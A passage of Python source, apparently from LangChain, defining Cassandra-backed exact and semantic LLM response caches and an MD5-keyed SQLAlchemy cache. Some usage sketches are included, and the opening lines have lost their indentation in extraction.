self.session = session
self.keyspace = keyspace
self.table_name = table_name
self.ttl_seconds = ttl_seconds
self.kv_cache = ElasticCassandraTable(
session=self.session,
keyspace=self.keyspace, |
            table=self.table_name,
keys=["llm_string", "prompt"],
primary_key_type=["TEXT", "TEXT"],
ttl_seconds=self.ttl_seconds,
skip_provisioning=skip_provisioning,
)
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Look up based on prompt and llm_string."""
item = self.kv_cache.get(
llm_string=_hash(llm_string),
prompt=_hash(prompt),
)
if item is not None:
generations = _loads_generations(item["body_blob"])
if generations is not None:
return generations
else:
return None
else:
return None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None:
"""Update cache based on prompt and llm_string."""
blob = _dumps_generations(return_val)
self.kv_cache.put(
llm_string=_hash(llm_string),
prompt=_hash(prompt),
body_blob=blob,
)
def delete_through_llm( |
        self, prompt: str, llm: LLM, stop: Optional[List[str]] = None
) -> None:
"""
A wrapper around `delete` with the LLM being passed.
In case the llm(prompt) calls have a `stop` param, you should pass it here
"""
llm_string = get_prompts(
{**llm.dict(), **{"stop": stop}},
[],
)[1]
return self.delete(prompt, llm_string=llm_string)
def delete(self, prompt: str, llm_string: str) -> None:
"""Evict from cache if there's an entry."""
return self.kv_cache.delete(
llm_string=_hash(llm_string),
prompt=_hash(prompt),
)
def clear(self, **kwargs: Any) -> None:
"""Clear cache. This is for all LLMs at once."""
self.kv_cache.clear()
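
# A minimal usage sketch for CassandraCache (illustrative only; the contact
# point and keyspace are placeholders, and a reachable Cassandra or Astra DB
# cluster plus the `cassio` package are assumed):
#
#     from cassandra.cluster import Cluster
#     from langchain.globals import set_llm_cache
#
#     session = Cluster(["127.0.0.1"]).connect()
#     set_llm_cache(CassandraCache(session=session, keyspace="my_keyspace"))
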
CASSANDRA_SEMANTIC_CACHE_DEFAULT_DISTANCE_METRIC = "dot"
CASSANDRA_SEMANTIC_CACHE_DEFAULT_SCORE_THRESHOLD = 0.85
CASSANDRA_SEMANTIC_CACHE_DEFAULT_TABLE_NAME = "langchain_llm_semantic_cache"
CASSANDRA_SEMANTIC_CACHE_DEFAULT_TTL_SECONDS = None
CASSANDRA_SEMANTIC_CACHE_EMBEDDING_CACHE_SIZE = 16
class CassandraSemanticCache(BaseCache): |
    """
Cache that uses Cassandra as a vector-store backend for semantic
(i.e. similarity-based) lookup.
It uses a single (vector) Cassandra table and stores, in principle,
cached values from several LLMs, so the LLM's llm_string is part
of the rows' primary keys.
The similarity is based on one of several distance metrics (default: "dot").
If choosing another metric, the default threshold is to be re-tuned accordingly.
"""
def __init__(
self,
session: Optional[CassandraSession],
keyspace: Optional[str],
embedding: Embeddings,
table_name: str = CASSANDRA_SEMANTIC_CACHE_DEFAULT_TABLE_NAME,
distance_metric: str = CASSANDRA_SEMANTIC_CACHE_DEFAULT_DISTANCE_METRIC,
score_threshold: float = CASSANDRA_SEMANTIC_CACHE_DEFAULT_SCORE_THRESHOLD,
ttl_seconds: Optional[int] = CASSANDRA_SEMANTIC_CACHE_DEFAULT_TTL_SECONDS,
skip_provisioning: bool = False,
):
"""
Initialize the cache with all relevant parameters.
Args:
session (cassandra.cluster.Session): an open Cassandra session
keyspace (str): the keyspace to use for storing the cache
embedding (Embedding): Embedding provider for semantic
encoding and search.
table_name (str): name of the Cassandra (vector) table
to use as cache |
            distance_metric (str, 'dot'): which measure to adopt for
                similarity searches
            score_threshold (optional float): numeric value to use as
                cutoff for the similarity searches
            ttl_seconds (optional int): time-to-live for cache entries
                (default: None, i.e. forever)

        The default score threshold is tuned to the default metric.
        Tune it carefully yourself if switching to another distance metric.
        """
        try:
            from cassio.table import MetadataVectorCassandraTable
        except (ImportError, ModuleNotFoundError):
            raise ValueError(
                "Could not import cassio python package. "
                "Please install it with `pip install cassio`."
            )
        self.session = session
        self.keyspace = keyspace
        self.embedding = embedding
        self.table_name = table_name
        self.distance_metric = distance_metric
        self.score_threshold = score_threshold
        self.ttl_seconds = ttl_seconds

        @lru_cache(maxsize=CASSANDRA_SEMANTIC_CACHE_EMBEDDING_CACHE_SIZE)
        def _cache_embedding(text: str) -> List[float]:
            return self.embedding.embed_query(text=text)

        self._get_embedding = _cache_embedding
        self.embedding_dimension = self._get_embedding_dimension()
        self.table = MetadataVectorCassandraTable(
            session=self.session,
            keyspace=self.keyspace,
            table=self.table_name,
            primary_key_type=["TEXT"],
            vector_dimension=self.embedding_dimension,
            ttl_seconds=self.ttl_seconds,
            metadata_indexing=("allow", {"_llm_string_hash"}),
            skip_provisioning=skip_provisioning,
        )
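        # Note: `_cache_embedding` above is memoized with `lru_cache`, so up to
        # CASSANDRA_SEMANTIC_CACHE_EMBEDDING_CACHE_SIZE (16) distinct prompt
        # texts are embedded only once per cache instance; a lookup() followed
        # by an update() on the same prompt costs a single embedding call.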

    def _get_embedding_dimension(self) -> int:
        return len(self._get_embedding(text="This is a sample sentence."))

    def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None:
        """Update cache based on prompt and llm_string."""
        embedding_vector = self._get_embedding(text=prompt)
        llm_string_hash = _hash(llm_string)
        body = _dumps_generations(return_val)
        metadata = {
            "_prompt": prompt,
            "_llm_string_hash": llm_string_hash,
        }
        row_id = f"{_hash(prompt)}-{llm_string_hash}"
        # the composite row id keeps identical prompts under different
        # LLM configurations in distinct rows
        self.table.put(
            body_blob=body,
            vector=embedding_vector,
            row_id=row_id,
            metadata=metadata,
        )

    def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
        """Look up based on prompt and llm_string."""
        hit_with_id = self.lookup_with_id(prompt, llm_string)
        if hit_with_id is not None:
            return hit_with_id[1]
        else:
            return None

    def lookup_with_id(
        self, prompt: str, llm_string: str
    ) -> Optional[Tuple[str, RETURN_VAL_TYPE]]:
        """
        Look up based on prompt and llm_string.
        If there are hits, return (document_id, cached_entry)
        """
        prompt_embedding: List[float] = self._get_embedding(text=prompt)
        hits = list(
            self.table.metric_ann_search(
                vector=prompt_embedding,
                metadata={"_llm_string_hash": _hash(llm_string)},
                n=1,
                metric=self.distance_metric,
                metric_threshold=self.score_threshold,
            )
        )
        if hits:
            hit = hits[0]
            generations = _loads_generations(hit["body_blob"])
            if generations is not None:
                return (
                    hit["row_id"],
                    generations,
                )
            else:
                # an unparseable stored blob is treated as a cache miss
                return None
        else:
            return None

    def lookup_with_id_through_llm(
        self, prompt: str, llm: LLM, stop: Optional[List[str]] = None
    ) -> Optional[Tuple[str, RETURN_VAL_TYPE]]:
        llm_string = get_prompts(
            {**llm.dict(), **{"stop": stop}},
            [],
        )[1]
        return self.lookup_with_id(prompt, llm_string=llm_string)

    def delete_by_document_id(self, document_id: str) -> None:
        """
        Given this is a "similarity search" cache, an invalidation pattern
        that makes sense is first a lookup to get an ID, and then deleting
        with that ID. This is for the second step.
        """
        self.table.delete(row_id=document_id)

    def clear(self, **kwargs: Any) -> None:
        """Clear the *whole* semantic cache."""
        self.table.clear()
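Because `CassandraSemanticCache` matches on embedding similarity rather than exact text, invalidation is the two-step pattern described in `delete_by_document_id` above: look up to obtain a row id, then delete by that id. A sketch, again treating `session`, `keyspace` and `llm` as pre-existing placeholders:

```python
from langchain.cache import CassandraSemanticCache
from langchain.embeddings import OpenAIEmbeddings

semantic_cache = CassandraSemanticCache(
    session=session,
    keyspace=keyspace,
    embedding=OpenAIEmbeddings(),
)

# Step 1: a similarity lookup that also returns the matched row's id.
hit = semantic_cache.lookup_with_id_through_llm("What is 1 + 1?", llm)
if hit is not None:
    document_id, _cached_generations = hit
    # Step 2: evict exactly that entry.
    semantic_cache.delete_by_document_id(document_id)
```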
class FullMd5LLMCache(Base):
    """SQLite table for full LLM Cache (all generations)."""

    __tablename__ = "full_md5_llm_cache"
    id = Column(String, primary_key=True)
    prompt_md5 = Column(String, index=True)
    llm = Column(String, index=True)
    idx = Column(Integer, index=True)
    prompt = Column(String)
    response = Column(String)
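The schema stores both an indexed `prompt_md5` and the full `prompt`. A plausible reading of this design (the snippet below is illustrative, not part of the module): the fixed-length hash keeps the index compact and fast, while the full-text equality check in the queries guards against hash collisions. The indexed key is simply:

```python
import hashlib

# 32-character hex digest used as the indexed lookup key:
key = hashlib.md5("What is 1 + 1?".encode()).hexdigest()
print(len(key))  # 32
```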
class SQLAlchemyMd5Cache(BaseCache):
    """Cache that uses SQLAlchemy as a backend."""

    def __init__(
        self, engine: Engine, cache_schema: Type[FullMd5LLMCache] = FullMd5LLMCache
    ):
        """Initialize by creating all tables."""
        self.engine = engine
        self.cache_schema = cache_schema
        self.cache_schema.metadata.create_all(self.engine)

    def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
        """Look up based on prompt and llm_string."""
        rows = self._search_rows(prompt, llm_string)
        if rows:
            return [loads(row[0]) for row in rows]
        return None

    def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None:
        """Update based on prompt and llm_string."""
        self._delete_previous(prompt, llm_string)
        prompt_md5 = self.get_md5(prompt)
        items = [
            self.cache_schema(
                id=str(uuid.uuid1()),
                prompt=prompt,
                prompt_md5=prompt_md5,
                llm=llm_string,
                response=dumps(gen),
                idx=i,
            )
            for i, gen in enumerate(return_val)
        ]
        with Session(self.engine) as session, session.begin():
            for item in items:
                session.merge(item)

    def _delete_previous(self, prompt: str, llm_string: str) -> None:
        # Select the ORM entities themselves (not just a column) so that
        # `session.delete` receives mapped instances rather than plain rows.
        stmt = (
            select(self.cache_schema)
            .where(self.cache_schema.prompt_md5 == self.get_md5(prompt))
            .where(self.cache_schema.llm == llm_string)
            .where(self.cache_schema.prompt == prompt)
        )
        with Session(self.engine) as session, session.begin():
            for item in session.execute(stmt).scalars():
                session.delete(item)

    def _search_rows(self, prompt: str, llm_string: str) -> List[Row]:
        prompt_md5 = self.get_md5(prompt)
        stmt = (
            select(self.cache_schema.response)
            .where(self.cache_schema.prompt_md5 == prompt_md5)
            .where(self.cache_schema.llm == llm_string)
            .where(self.cache_schema.prompt == prompt)
            .order_by(self.cache_schema.idx)
        )
        with Session(self.engine) as session:
            return session.execute(stmt).fetchall()

    def clear(self, **kwargs: Any) -> None:
        """Clear cache."""
        with Session(self.engine) as session, session.begin():
            session.query(self.cache_schema).delete()

    @staticmethod
    def get_md5(input_string: str) -> str:
        return hashlib.md5(input_string.encode()).hexdigest()
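Finally, a sketch of wiring this cache up as the process-wide LLM cache, assuming a local SQLite file as the backend (the file name is illustrative):

```python
import langchain
from sqlalchemy import create_engine
from langchain.cache import SQLAlchemyMd5Cache

engine = create_engine("sqlite:///.langchain.db")
langchain.llm_cache = SQLAlchemyMd5Cache(engine)
```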